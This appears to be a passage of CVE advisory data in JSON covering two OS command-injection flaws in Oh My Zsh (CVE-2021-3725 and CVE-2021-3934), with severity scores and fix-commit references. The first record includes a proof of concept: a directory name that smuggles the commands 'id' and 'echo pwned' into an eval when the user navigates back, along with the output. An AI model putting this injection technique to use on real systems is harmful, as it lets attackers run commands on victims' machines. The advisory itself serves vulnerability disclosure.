"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
]
},
"exploit": [
{
"lang": "en",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory\u0027;id;echo \u0027pwned\"\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ \u003cAlt-Left\u003e\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3725",
"datePublished": "2021-11-30T09:30:14",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3934 (GCVE-0-2021-3934)
Vulnerability from cvelistv5 – Published: 2021-11-12 11:45 – Updated: 2024-08-03 17:09
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command
Severity ?
7.8 (High)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh |
Affected:
unspecified , < 6cb41b70a6d04301fd50cd5862ecd705ba226c0e
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:09:09.615Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "6cb41b70a6d04301fd50cd5862ecd705ba226c0e",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-12T11:45:10",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
],
"source": {
"advisory": "ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"discovery": "EXTERNAL"
},
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3934",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 Improper Neutralization of Special Elements used in an OS Command"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
]
},
"source": {
"advisory": "ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3934",
"datePublished": "2021-11-12T11:45:10",
"dateReserved": "2021-11-08T00:00:00",
"dateUpdated": "2024-08-03T17:09:09.615Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}